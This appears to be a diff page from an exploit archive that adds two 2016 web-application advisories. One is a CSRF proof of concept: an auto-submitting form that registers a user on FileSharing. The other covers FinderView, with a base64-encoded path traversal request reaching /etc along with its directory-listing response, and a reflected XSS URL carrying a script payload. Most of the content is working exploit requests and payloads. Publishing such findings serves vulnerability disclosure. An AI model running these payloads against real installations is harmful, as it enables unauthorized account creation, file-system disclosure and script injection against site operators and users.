# Date: 2016-06-23
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/XuezhuLi
# Software Link: https://github.com/XuezhuLi/FileSharing/archive/master.zip
# Version: Latest commit
# Tested on: Debian [wheezy]
-->
<form name="csrf_poc" action="http://127.0.0.1/vul_test/FileSharing/signup.php" method="POST">
<input type="hidden" name="sign" value="ok">
<input type="hidden" name="newuser" value="csrf_test">
<input type="submit" value="Replay!">
</form>
<script type="text/javascript">document.forms.csrf_poc.submit();</script>
<!--
Output.
#> cat /srv/userlists.txt
aaaa
csrf_test
-->

23
platforms/php/webapps/40011.txt Executable file
View file

@ -0,0 +1,23 @@
# Exploit Title: FinderView - Multiple Vulnerability(Path Traversal/Reflected XSS)
# Date: 2016-06-23
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/proin/
# Software Link: https://github.com/proin/FinderView/archive/master.zip
# Version: Latest commit
# Tested on: Debian [wheezy]
### Vulnerability1 - Path Traversal(view directory)
Request
GET /vul_test/FinderView/api.php?callback=jQuery21107685743998649676_1466662516225&type=get&mode=0&folder=Li4vLi4vLi4vLi4vLi4vLi4vZXRjLw==&_=1466662516227 HTTP/1.1
Host: 127.0.0.1
..snip..
Connection: keep-alive
Response
jQuery21107685743998649676_1466662516225([{"folders":[{"name":"backups","folderuri":"Li4vLi4vLi4vLi4vYmFja3Vwcw==","folderuri_nobase":"../../../../backups","size":"0.0 KB","date":"15 June 2016"},
..snip..
,{"name":"opt","folderuri":"Li4vLi4vLi4vLi4vb3B0","folderuri_nobase":"../../../../opt","size":"0.0 KB","date":"26 August 2015"},{"name":"run","folderuri":"Li4vLi4vLi4vLi4vcnVu","folderuri_nobase":"../../../../run","size":"0.0 KB","date":"23 June 2016"},{"name":"spool","folderuri":"Li4vLi4vLi4vLi4vc3Bvb2w=","folderuri_nobase":"../../../../spool","size":"0.0 KB","date":"26 August 2015"},{"name":"tmp","folderuri":"Li4vLi4vLi4vLi4vdG1w","folderuri_nobase":"../../../../tmp","size":"0.0 KB","date":"23 June 2016"},{"name":"www","folderuri":"Li4vLi4vLi4vLi4vd3d3","folderuri_nobase":"../../../../www","size":"0.0 KB","date":"22 January
### Vulnerability2 - Reflected XSS
http://127.0.0.1/vul_test/FinderView/api.php?callback=jQuery211027821724654516156_1466662510279}}1c027%3Cscript%3Ealert%281%29%3C%2fscript%3Ecf2ea&type=get&mode=0&_=1466662510280

0
platforms/php/webapps/9387.tx → platforms/php/webapps/9387.txt
View file

0
platforms/windows/dos/15444.zip → platforms/windows/dos/15444.txt
View file